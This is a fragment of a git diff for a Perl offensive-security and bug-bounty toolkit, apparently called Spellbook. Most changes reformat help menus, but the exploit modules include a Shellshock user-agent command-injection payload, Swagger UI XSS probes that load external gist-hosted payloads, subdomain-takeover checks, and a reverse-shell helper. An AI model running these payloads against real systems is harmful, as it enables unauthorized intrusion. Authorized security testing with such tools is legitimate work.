-Exploit::Reflected_XSS -===================== --h, --help See this menu --t, --target Set an website to see paths from WayBackMachine\n"; - -EOT + return " + \rExploit::Reflected_XSS + \r===================== + \r-h, --help See this menu + \r-t, --target Set an website to see paths from WayBackMachine\n"; } return 0; diff --git a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm index 60cce59..2a353b1 100644 --- a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm +++ b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm @@ -14,7 +14,7 @@ package Spellbook::Exploit::S3_Bucket_Takeover { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } @@ -29,17 +29,14 @@ package Spellbook::Exploit::S3_Bucket_Takeover { } return @result; - } + } if ($help) { - return<<"EOT"; - -Exploit::S3_Bucket_Takeover -===================== --h, --help See this menu --t, --target Check the possibility to takeover an s3 resource\n"; - -EOT + return " + \rExploit::S3_Bucket_Takeover + \r===================== + \r-h, --help See this menu + \r-t, --target Check the possibility to takeover an s3 resource\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Shellshock.pm b/lib/Spellbook/Exploit/Shellshock.pm index 870e30f..3b2e4a9 100644 --- a/lib/Spellbook/Exploit/Shellshock.pm +++ b/lib/Spellbook/Exploit/Shellshock.pm @@ -19,7 +19,7 @@ package Spellbook::Exploit::Shellshock { agent => "() { :; }; echo; echo; /bin/bash -c 'ls'" ); - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -31,15 +31,12 @@ package Spellbook::Exploit::Shellshock { } if ($help) { - return<<"EOT"; - -Exploit::Shellshock -===================== --h, --help See this menu --t, --target Define a target --c, --command Define a command to delivery\n\n"; - -EOT + return " + \rExploit::Shellshock + \r===================== + \r-h, --help See this menu + \r-t, --target Define a target + \r-c, --command Define a command to delivery\n\n"; } return 0; diff --git a/lib/Spellbook/Exploit/Subdomain_Takeover.pm b/lib/Spellbook/Exploit/Subdomain_Takeover.pm index 43e250e..1b1832a 100644 --- a/lib/Spellbook/Exploit/Subdomain_Takeover.pm +++ b/lib/Spellbook/Exploit/Subdomain_Takeover.pm @@ -9,71 +9,65 @@ package Spellbook::Exploit::Subdomain_Takeover { my ($self, $parameters) = @_; my ($help, $target, @results); - my %service_fingerprints = ( - "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", - "1eb970ce5a18bec7165f016df8238566" => "github.github.io", - "387caa8a924c5f92496824494b929207" => "heroku.com", - "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", - "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", - "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", - "308be540e2821668fb15c42317b1a256" => "wpengine.com", - "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", - "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", - "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", - "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", - ); - - Getopt::Long::GetOptionsFromArray( + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($help) { - return <<"EOT"; - -Exploit::Subdomain_Takeover_Check -============== --h, --help See this menu --t, --target Define a target - -EOT - } - - return @results unless $target; - - $target =~ s/^http(s)?:\/\///x; - - my $resolv = Net::DNS::Resolver->new(); - my $reply = $resolv->search($target); - - return @results unless $reply; - - $target = "https://$target"; - - foreach my $dns_resource ($reply->answer()) { - next unless $dns_resource->can("cname"); - - my $cname = $dns_resource->cname(); - - while (my ($hash, $service) = each %service_fingerprints) { - next unless $cname =~ m/$service/x; - - my $useragent = Spellbook::Core::UserAgent->new(); - my $response = $useragent->get($target); - - if ($response->code() == 200 || $response->code() == 404) { - my $content_hash = md5_hex($response->content()); - - if ($hash eq $content_hash) { - push @results, $target; - last; + if ($target) { + $target =~ s/^http(s)?:\/\///x; + + my $resolv = Net::DNS::Resolver -> new(); + my $reply = $resolv -> search($target); + + if ($reply) { + $target = "https://$target"; + + foreach my $rr ($reply -> answer()) { + if ($rr -> can("cname")) { + my %hashes = ( + "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", + "1eb970ce5a18bec7165f016df8238566" => "github.github.io", + "387caa8a924c5f92496824494b929207" => "heroku.com", + "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", + "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", + "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", + "308be540e2821668fb15c42317b1a256" => "wpengine.com", + "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", + "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", + "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", + "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", + # "9043fb5164b8a1a5fea8031025fe9ef8" => "firebase", + # "648e671c67c7aee4eae2918e7cfbf5e4" => "squarespace.com" + ); + + foreach (%hashes) { + if ($rr -> cname() =~ m/$_/x) { + my $useragent = Spellbook::Core::UserAgent -> new(); + my $request = $useragent -> get($target); + + if ($request -> code() == 200 || $request -> code() == 404) { + my $md5 = md5_hex($request -> content()); + + return @results, $target if $hashes{$md5}; + } + } + } } } } + + return @results; } - return @results; + if ($help) { + return " + \rExploit::Subdomain_Takeover_Check + \r============== + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; + } } } diff --git a/lib/Spellbook/Exploit/Swagger_XSS.pm b/lib/Spellbook/Exploit/Swagger_XSS.pm index 4972d0c..4fd032c 100644 --- a/lib/Spellbook/Exploit/Swagger_XSS.pm +++ b/lib/Spellbook/Exploit/Swagger_XSS.pm @@ -1,67 +1,71 @@ package Spellbook::Exploit::Swagger_XSS { - use strict; use warnings; use Spellbook::Core::UserAgent; sub new { my ($self, $parameters) = @_; - my ($help, $target, @vulnerable_endpoints); + my ($help, $target, @result); - Getopt::Long::GetOptionsFromArray( + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($help) { - return <<"EOT"; -Exploit::Swagger_XSS -===================== --h, --help See this menu --t, --target Set a target - -EOT - } - - return 0 unless $target; - - $target = "https://$target" unless $target =~ /^http(?:s)?:\/\//x; - $target =~ s/\/$//x; - - my $useragent = Spellbook::Core::UserAgent->new(); - - my @paths = ( - "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", - "/api/swagger", "/api/swagger-ui", "/api/swagger.json", "/api/v2/api-docs", - "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", - "/docs/v2/api-docs", "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", - "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", "/api/v2/swagger-ui.html", - "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" - ); - - my @payloads = ( - "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", - "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" - ); - - foreach my $path (@paths) { - my $base_url = "$target$path"; - my $initial_response = $useragent->get($base_url); - - next unless $initial_response->code() == 200; - next unless $initial_response->content() =~ /<title>(.*)<\/title>/x; - next unless $1 =~ /Swagger UI/; - - foreach my $payload (@payloads) { - my $test_url = $base_url . $payload; - my $test_response = $useragent->get($test_url); + if ($target) { + if ($target !~ /^http(s)?:\/\//x) { + $target = "https://$target"; + } - push @vulnerable_endpoints, $test_url if $test_response->code() == 200; + $target =~ s/\/$//x; + my $useragent = Spellbook::Core::UserAgent -> new(); + + my @paths = ( + "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", "/api/swagger", "/api/swagger-ui", "/api/swagger.json", + "/api/v2/api-docs", "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", "/docs/v2/api-docs", + "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", + "/api/v2/swagger-ui.html", "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" + ); + + foreach my $path (@paths) { + my $request = $useragent -> get("$target$path"); + + if ($request -> code() == 200) { + if ($request -> content() =~ /<title>(.*)<\/title>/x) { + my $title = $1; + + if ($title =~ /Swagger UI/x) { + my @payloads = ( + "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", + "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" + ); + + foreach my $payload (@payloads) { + my $endpoint = $target . $path . $payload; + my $request = $useragent -> get($endpoint); + + if ($request -> code() == 200) { + push @result, $endpoint; + } + } + } + } + } } + + return @result; } - return @vulnerable_endpoints; + if ($help) { + return " + \rExploit::Swagger_XSS + \r===================== + \r-h, --help See this menu + \r-t, --target Set a target\n\n"; + } + + return 0; } } diff --git a/lib/Spellbook/Exploit/Upload_Via_PUT.pm b/lib/Spellbook/Exploit/Upload_Via_PUT.pm index 6829372..53a4f67 100644 --- a/lib/Spellbook/Exploit/Upload_Via_PUT.pm +++ b/lib/Spellbook/Exploit/Upload_Via_PUT.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Upload_Via_PUT { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -32,14 +32,11 @@ package Spellbook::Exploit::Upload_Via_PUT { } if ($help) { - return<<"EOT"; - -Recon::Explioit -===================== --h, --help See this menu --t, --target Define\n\n"; - -EOT + return " + \rRecon::Explioit + \r===================== + \r-h, --help See this menu + \r-t, --target Define\n\n"; } return 0; diff --git a/lib/Spellbook/Helper/CDN_Checker.pm b/lib/Spellbook/Helper/CDN_Checker.pm index caa1bd5..686884c 100644 --- a/lib/Spellbook/Helper/CDN_Checker.pm +++ b/lib/Spellbook/Helper/CDN_Checker.pm @@ -7,52 +7,54 @@ package Spellbook::Helper::CDN_Checker { use Spellbook::Recon::Get_IP; sub new { - my ($self, $parameters) = @_; - my ($help, $target, @result); + my ($self, $parameters) = @_; + my ($help, $target, @result); - Getopt::Long::GetOptionsFromArray ( - $parameters, - "h|help" => \$help, - "t|target=s" => \$target - ); - - return <<"EOT" if $help; - -Helper::CDN_Checker -===================== --h, --help See this menu --t --target Define a target\n\n"; - -EOT - - return 0 unless $target; + Getopt::Long::GetOptionsFromArray ( + $parameters, + "h|help" => \$help, + "t|target=s" => \$target + ); + if ($target) { my $ip = Spellbook::Recon::Get_IP -> new (["--target" => $target]); - return 0 unless $ip; - - my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; - my $useragent = Spellbook::Core::UserAgent -> new (); - my $request = $useragent -> get($cnd_list); - - return 0 unless $request->code == 200; - my $data = decode_json($request -> content); - my $content = $data -> {"cdn"}; # we have others options - - my $target_ip = Net::IP->new($ip); - - for my $provider (keys %{$content}) { - for my $range (@{$content->{$provider}}) { - my $cdn_range = Net::IP->new($range); - if ($cdn_range->overlaps($target_ip)) { - push @result, $target; - return @result; + if ($ip) { + my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; + my $useragent = Spellbook::Core::UserAgent -> new (); + my $request = $useragent -> get($cnd_list); + + if ($request -> code == 200) { + my $data = decode_json($request -> content); + my $content = $data -> {"cdn"}; # we have others options + + for (keys %{$content}) { + for (@{$content -> {$_}}) { + my $range = Net::IP -> new($_); + my $value = Net::IP -> new($ip); + my $match = $range -> overlaps($value); + + if ($match) { + push @result, $target; + } + } } } } return @result; } + + if ($help) { + return " + \rHelper::CDN_Checker + \r===================== + \r-h, --help See this menu + \r-t --target Define a target\n\n"; + } + + return 0; + } } 1; \ No newline at end of file diff --git a/lib/Spellbook/Helper/Exifs_Write.pm b/lib/Spellbook/Helper/Exifs_Write.pm index efe40a5..ea7fb0b 100755 --- a/lib/Spellbook/Helper/Exifs_Write.pm +++ b/lib/Spellbook/Helper/Exifs_Write.pm @@ -44,15 +44,12 @@ package Spellbook::Helper::Exifs_Write { } if ($help) { - return<<"EOT"; - -Helper::Exifs_Write -===================== --h, --help See this menu --f, --file Define a file write the payload --p --payload Set a payload to write into file\n\n"; - -EOT + return " + \rHelper::Exifs_Write + \r===================== + \r-h, --help See this menu + \r-f, --file Define a file write the payload + \r-p --payload Set a payload to write into file\n\n"; } return 0; diff --git a/lib/Spellbook/Helper/Generate_UUID.pm b/lib/Spellbook/Helper/Generate_UUID.pm index e80b5c6..eeb9157 100644 --- a/lib/Spellbook/Helper/Generate_UUID.pm +++ b/lib/Spellbook/Helper/Generate_UUID.pm @@ -19,23 +19,20 @@ package Spellbook::Helper::Generate_UUID { if ($version) { for (my $i = 1; $i <= $repeat; $i++) { my $generate = create_uuid_as_string($version); - + push @result, $generate; } - + return @result; } if ($help) { - return<<"EOT"; - -Helper::Generate_UUID -===================== --h, --help See this menu --v, --version Version of UUID algorithm --r, --repeat Quantities of repetitions\n\n"; - -EOT + return " + \rHelper::Generate_UUID + \r===================== + \r-h, --help See this menu + \r-v, --version Version of UUID algorithm + \r-r, --repeat Quantities of repetitions\n\n"; } return 0; diff --git a/lib/Spellbook/Helper/Host_Normalization.pm b/lib/Spellbook/Helper/Host_Normalization.pm index cf234e4..a786063 100644 --- a/lib/Spellbook/Helper/Host_Normalization.pm +++ b/lib/Spellbook/Helper/Host_Normalization.pm @@ -14,7 +14,7 @@ package Spellbook::Helper::Host_Normalization { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } @@ -34,14 +34,11 @@ package Spellbook::Helper::Host_Normalization { } if ($help) { - return<<"EOT"; - -Helper::Host_Normalization -========================== --h, --help See this menu --t, --target Define a target to normalize\n\n"; - -EOT + return " + \rHelper::Host_Normalization + \r========================== + \r-h, --help See this menu + \r-t, --target Define a target to normalize\n\n"; } return 0; diff --git a/lib/Spellbook/Helper/Permutations.pm b/lib/Spellbook/Helper/Permutations.pm index 1344ab5..cc615cd 100644 --- a/lib/Spellbook/Helper/Permutations.pm +++ b/lib/Spellbook/Helper/Permutations.pm @@ -25,23 +25,20 @@ package Spellbook::Helper::Permutations { $chars[$i] = $chars[$random]; $chars[$random] = $temp; } - + push @result, join("", @chars); } - - return @result; + + return @result; } if ($help) { - return<<"EOT"; - -Helper::Permutations -===================== --h, --help See this menu --v, --value Provide a seed --r, --repeat Quantities of repetitions\n\n"; - -EOT + return " + \rHelper::Permutations + \r===================== + \r-h, --help See this menu + \r-v, --value Provide a seed + \r-r, --repeat Quantities of repetitions\n\n"; } return 0; diff --git a/lib/Spellbook/Helper/Read_File.pm b/lib/Spellbook/Helper/Read_File.pm index cc39cba..a0c7ac8 100644 --- a/lib/Spellbook/Helper/Read_File.pm +++ b/lib/Spellbook/Helper/Read_File.pm @@ -2,13 +2,12 @@ package Spellbook::Helper::Read_File { use strict; use warnings; use Spellbook::Core::Module; - use Carp qw(croak); sub new { - my ($self, $parameters) = @_; + my ($self, $parameters)= @_; my ($help, $file, $entrypoint, @result); - Getopt::Long::GetOptionsFromArray( + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, "f|file=s" => \$file, @@ -16,36 +15,36 @@ package Spellbook::Helper::Read_File { ); if ($file) { - local $/ = "\n"; - open my $fh, "<", $file or croak "Failed to open file: $!"; - my @lines = <$fh>; - close $fh; + open (my $filename, "<", $file); - for my $line (@lines) { - chomp($line); + while (<$filename>) { + chomp ($_); if ($entrypoint) { - my $return = Spellbook::Core::Module->new($entrypoint, ["--target" => $line]); + my $return = Spellbook::Core::Module -> new ($entrypoint, ["--target" => $_]); + if ($return) { - push @result, $line; + push @result, $_; } } + else { - push @result, $line; + push @result, $_; } } - return @result; - } - return <<"EOT"; + close ($filename); -Helper::Read_File -===================== --h, --help See this menu --f, --file Define a file to read --e, --entrypoint Set a other module to send the output + return @result; + } -EOT + + return " + \rHelper::Read_File + \r===================== + \r-h, --help See this menu + \r-f, --file Define a file to read + \r-e, --entrypoint Set a other module to send the output\n\n"; } } diff --git a/lib/Spellbook/Helper/Reverse_Shell.pm b/lib/Spellbook/Helper/Reverse_Shell.pm index e5a22d1..5e7c3ae 100644 --- a/lib/Spellbook/Helper/Reverse_Shell.pm +++ b/lib/Spellbook/Helper/Reverse_Shell.pm @@ -6,7 +6,7 @@ package Spellbook::Helper::Reverse_Shell { sub new { my ($self, $parameters) = @_; my ($help, $target); - + my $port = 1337; my $lang = "perl"; @@ -28,18 +28,15 @@ package Spellbook::Helper::Reverse_Shell { } if ($help) { - return<<"EOT"; - -Helper::Reverse_Shell -===================== --h, --help See this menu --t, --target Set your IP/Host to send the reverse shell --p, --port Define a port to connect --l, --lang Default is perl, types avaible: perl, bash\n\n"; - -EOT + return " + \rHelper::Reverse_Shell + \r===================== + \r-h, --help See this menu + \r-t, --target Set your IP/Host to send the reverse shell + \r-p, --port Define a port to connect + \r-l, --lang Default is perl, types avaible: perl, bash\n\n"; } - + return 0; } } diff --git a/lib/Spellbook/Helper/Scope.pm b/lib/Spellbook/Helper/Scope.pm index 4320c8d..79de620 100644 --- a/lib/Spellbook/Helper/Scope.pm +++ b/lib/Spellbook/Helper/Scope.pm @@ -42,16 +42,16 @@ package Spellbook::Helper::Scope { push @results, $info; } } - + if ($save) { if ($keep && exists $yamlfile->[0]->{$save}) { push @{$yamlfile->[0]->{$save}}, @results; } - + else { $yamlfile->[0]->{$save} = [@results]; } - + $yamlfile->write($scope); } @@ -59,20 +59,17 @@ package Spellbook::Helper::Scope { } if ($help) { - return<<"EOT"; - -Helper::Scope -===================== --h, --help See this menu --S, --scope Define a YML file as a scope --i, --information Set an information to extract from your scope --e, --entrypoint Send informations to another entrypoint module --K, --keep Keep the current values in the file and add news values ---save Save the output on some attribute\n\n"; - -EOT + return " + \rHelper::Scope + \r===================== + \r-h, --help See this menu + \r-S, --scope Define a YML file as a scope + \r-i, --information Set an information to extract from your scope + \r-e, --entrypoint Send informations to another entrypoint module + \r-K, --keep Keep the current values in the file and add news values + \r--save Save the output on some attribute\n\n"; } - + return 0; } } diff --git a/lib/Spellbook/Helper/Uniq.pm b/lib/Spellbook/Helper/Uniq.pm index 7541696..d4f81a2 100644 --- a/lib/Spellbook/Helper/Uniq.pm +++ b/lib/Spellbook/Helper/Uniq.pm @@ -17,14 +17,11 @@ package Spellbook::Helper::Uniq { } if ($help) { - return<<"EOT"; - -Helper::Uniq -===================== --h, --help See this menu --v, --target Define a value\n\n"; - -EOT + return " + \rHelper::Uniq + \r===================== + \r-h, --help See this menu + \r-v, --target Define a value\n\n"; } return 0; diff --git a/lib/Spellbook/Parser/Nmap.pm b/lib/Spellbook/Parser/Nmap.pm index 2f464f0..6127b7b 100644 --- a/lib/Spellbook/Parser/Nmap.pm +++ b/lib/Spellbook/Parser/Nmap.pm @@ -2,7 +2,7 @@ package Spellbook::Parser::Nmap { use strict; use warnings; use XML::Simple; - + # https://metacpan.org/pod/Nmap::Parser sub new { @@ -18,14 +18,14 @@ package Spellbook::Parser::Nmap { if ($file) { my $xml = XML::Simple -> new(); my $data = $xml -> XMLin($file); - + my $host = $data -> {host} -> {address} -> {addr}; - + # foreach my $content (@{$data -> {host} -> {ports} -> {port}}) { # print Dumper($content); # push @result, $element -> {Key}; # } - + # my $state = $content -> {state} -> {state}; # if (($state eq "open") || ($state eq "filtered")) { @@ -36,19 +36,16 @@ package Spellbook::Parser::Nmap { # push @results, "$host -> [$protocol] | [$state]-> $port \t | $service\n"; # } # }; - + return @results; } if ($help) { - return<<"EOT"; - -Parser::Nmap -===================== --h, --help See this menu --f, --file Set an XML file from Nmap output\n\n"; - -EOT + return " + \rParser::Nmap + \r===================== + \r-h, --help See this menu + \r-f, --file Set an XML file from Nmap output\n\n"; } return 0; diff --git a/lib/Spellbook/Parser/Nozaki.pm b/lib/Spellbook/Parser/Nozaki.pm index fed200a..36f9551 100644 --- a/lib/Spellbook/Parser/Nozaki.pm +++ b/lib/Spellbook/Parser/Nozaki.pm @@ -25,14 +25,11 @@ package Spellbook::Parser::Nozaki { } if ($help) { - return<<"EOT"; - -Parser::Nozaki -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rParser::Nozaki + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } return 0; diff --git a/lib/Spellbook/Parser/S3_Bucket.pm b/lib/Spellbook/Parser/S3_Bucket.pm index 16288ba..acdd4aa 100644 --- a/lib/Spellbook/Parser/S3_Bucket.pm +++ b/lib/Spellbook/Parser/S3_Bucket.pm @@ -16,10 +16,10 @@ package Spellbook::Parser::S3_Bucket { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { - $target = "https://$target"; + if ($target !~ /^http(s)?:\/\//x) { + $target = "https://$target"; } - + if ($target !~ /\/$/x) { $target .= "/"; } my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -35,19 +35,16 @@ package Spellbook::Parser::S3_Bucket { } } } - + return @result; } if ($help) { - return<<"EOT"; - -Parser::Bucket -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rParser::Bucket + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } return 0; diff --git a/lib/Spellbook/Parser/Sitemap.pm b/lib/Spellbook/Parser/Sitemap.pm index 48c2ad7..8ffb154 100644 --- a/lib/Spellbook/Parser/Sitemap.pm +++ b/lib/Spellbook/Parser/Sitemap.pm @@ -15,7 +15,7 @@ package Spellbook::Parser::Sitemap { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } if ($target !~ /\/sitemap.xml$/x) { $target = "$target/sitemap.xml"; } my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -33,19 +33,16 @@ package Spellbook::Parser::Sitemap { } } } - + return @result; } if ($help) { - return<<"EOT"; - -Parser::Sitemap -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rParser::Sitemap + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } return 0; diff --git a/lib/Spellbook/Platform/HackerOne.pm b/lib/Spellbook/Platform/HackerOne.pm index 739fa84..003a6a6 100644 --- a/lib/Spellbook/Platform/HackerOne.pm +++ b/lib/Spellbook/Platform/HackerOne.pm @@ -18,7 +18,7 @@ package Spellbook::Platform::HackerOne { ); my $token = Spellbook::Core::Credentials -> new(["--platform" => "hackerone"]); - + if ($token && $target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $api_url = "https://api.hackerone.com/v1/hackers/programs/$target"; @@ -35,7 +35,7 @@ package Spellbook::Platform::HackerOne { for my $scope (@{$data -> {"relationships"} -> {"structured_scopes"} -> {"data"}}) { if (($scope -> {"attributes"} -> {"asset_type"} eq "URL") && ($scope -> {"attributes"} -> {"eligible_for_bounty"})) { my $url = $scope -> {"attributes"} -> {"asset_identifier"}; - + push @result, Spellbook::Helper::Host_Normalization -> new(["--target" => $url]); } } @@ -45,18 +45,15 @@ package Spellbook::Platform::HackerOne { } if ($help) { - return<<"EOT"; - -Platform::HackerOne -===================== --h, --help See this menu --t, --target Program handle from HackerOne\n\n"; - -EOT + return " + \rPlatform::HackerOne + \r===================== + \r-h, --help See this menu + \r-t, --target Program handle from HackerOne\n\n"; } return 0; } -} +} 1; \ No newline at end of file diff --git a/lib/Spellbook/Platform/Intigriti.pm b/lib/Spellbook/Platform/Intigriti.pm index 8c049c3..4db7ac1 100644 --- a/lib/Spellbook/Platform/Intigriti.pm +++ b/lib/Spellbook/Platform/Intigriti.pm @@ -5,13 +5,10 @@ package Spellbook::Platform::Intigriti { sub new { my ($self, $parameters) = @_; - return<<"EOT"; - -Platform::Intigriti -=================== -This module is under development\n\n"; - -EOT + return " + \rPlatform::Intigriti + \r=================== + \rThis module is under development\n\n"; } } diff --git a/lib/Spellbook/Recon/DNS_Bruteforce.pm b/lib/Spellbook/Recon/DNS_Bruteforce.pm index 34d3a1c..22c74f0 100644 --- a/lib/Spellbook/Recon/DNS_Bruteforce.pm +++ b/lib/Spellbook/Recon/DNS_Bruteforce.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::DNS_Bruteforce { if (@file) { foreach my $line (@file) { my $return = Spellbook::Recon::Host_Resolv -> new (["--target" => "$line.$target"]); - + if ($return) { push @result, "$line.$target"; } @@ -31,17 +31,14 @@ package Spellbook::Recon::DNS_Bruteforce { return @result; } - + if ($help) { - return<<"EOT"; - -Recon::DNS_Bruteforce -===================== --h, --help See this menu --t, --target Set a domain as a target --f, --file Define a wordlist\n\n"; - -EOT + return " + \rRecon::DNS_Bruteforce + \r===================== + \r-h, --help See this menu + \r-t, --target Set a domain as a target + \r-f, --file Define a wordlist\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Detect_Error.pm b/lib/Spellbook/Recon/Detect_Error.pm index 987405d..56ce245 100644 --- a/lib/Spellbook/Recon/Detect_Error.pm +++ b/lib/Spellbook/Recon/Detect_Error.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Detect_Error { if ($target) { $target =~ s/^http(s)?:\/\///x; - + my $resolv = Net::DNS::Resolver -> new(); my $reply = $resolv -> search($target); @@ -30,7 +30,7 @@ package Spellbook::Recon::Detect_Error { if ($request -> code() == 404) { push @results, $target; - } + } } } } @@ -39,14 +39,11 @@ package Spellbook::Recon::Detect_Error { } if ($help) { - return<<"EOT"; - -Checker -============== --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rChecker + \r============== + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } } } diff --git a/lib/Spellbook/Recon/Dorking.pm b/lib/Spellbook/Recon/Dorking.pm index 1302d64..a3bbd8a 100644 --- a/lib/Spellbook/Recon/Dorking.pm +++ b/lib/Spellbook/Recon/Dorking.pm @@ -20,13 +20,11 @@ package Spellbook::Recon::Dorking { } if ($help) { - return<<"EOT"; - -Recon::Dorking -===================== --h, --help See this menu\n\n"; - -EOT + return " + \rRecon::Dorking + \r===================== + \r-h, --help See this menu + \r \n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Extract_Links.pm b/lib/Spellbook/Recon/Extract_Links.pm index 46b6c1a..3fb8bde 100755 --- a/lib/Spellbook/Recon/Extract_Links.pm +++ b/lib/Spellbook/Recon/Extract_Links.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::Extract_Links { ssl_opts => { verify_hostname => 0 } ); - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -30,12 +30,12 @@ package Spellbook::Recon::Extract_Links { my $request = $mech -> get($target); my @links = $mech -> links(); - + for my $link (@links) { my $url = $link -> url(); - if (($url) && ($url !~ m/#/x) && ($url !~ /^http(?:s)?:\/\//x)) { - if ($url !~ /^\//x) { + if (($url) && ($url !~ m/#/x) && ($url !~ /^http(s)?:\/\//x)) { + if ($url !~ /^\//x) { $url = "/" . $url; } @@ -57,15 +57,12 @@ package Spellbook::Recon::Extract_Links { } if ($help) { - return<<"EOT"; - -Recon::Extrac_Links -===================== --h, --help See this menu --t, --target Define a web page to extract all links --d, --deep Draft recursive function\n\n"; - -EOT + return " + \rRecon::Extrac_Links + \r===================== + \r-h, --help See this menu + \r-t, --target Define a web page to extract all links + \r-d, --deep Draft recursive function\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Find_Emails.pm b/lib/Spellbook/Recon/Find_Emails.pm index 21674e0..f1d9a38 100644 --- a/lib/Spellbook/Recon/Find_Emails.pm +++ b/lib/Spellbook/Recon/Find_Emails.pm @@ -30,18 +30,15 @@ package Spellbook::Recon::Find_Emails { } return @result; - } + } } if ($help) { - return<<"EOT"; - -Recon::Find_Emails -===================== --h, --help See this menu --t, --target Define a domain to find emails\n"; - -EOT + return " + \rRecon::Find_Emails + \r===================== + \r-h, --help See this menu + \r-t, --target Define a domain to find emails\n"; } return 0; diff --git a/lib/Spellbook/Recon/Get_IP.pm b/lib/Spellbook/Recon/Get_IP.pm index e3f8533..e6eb2ad 100644 --- a/lib/Spellbook/Recon/Get_IP.pm +++ b/lib/Spellbook/Recon/Get_IP.pm @@ -22,18 +22,15 @@ package Spellbook::Recon::Get_IP { if ($ip) { return inet_ntoa($ip); - } + } } if ($help) { - return<<"EOT"; - -Recon::Get_IP -===================== --h, --help See this menu --t, --target Set a domain to get the IP\n\n"; - -EOT + return " + \rRecon::Get_IP + \r===================== + \r-h, --help See this menu + \r-t, --target Set a domain to get the IP\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/HTTP_Probe.pm b/lib/Spellbook/Recon/HTTP_Probe.pm index ee5e606..49e9467 100644 --- a/lib/Spellbook/Recon/HTTP_Probe.pm +++ b/lib/Spellbook/Recon/HTTP_Probe.pm @@ -14,14 +14,14 @@ package Spellbook::Recon::HTTP_Probe { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } my $userAgent = 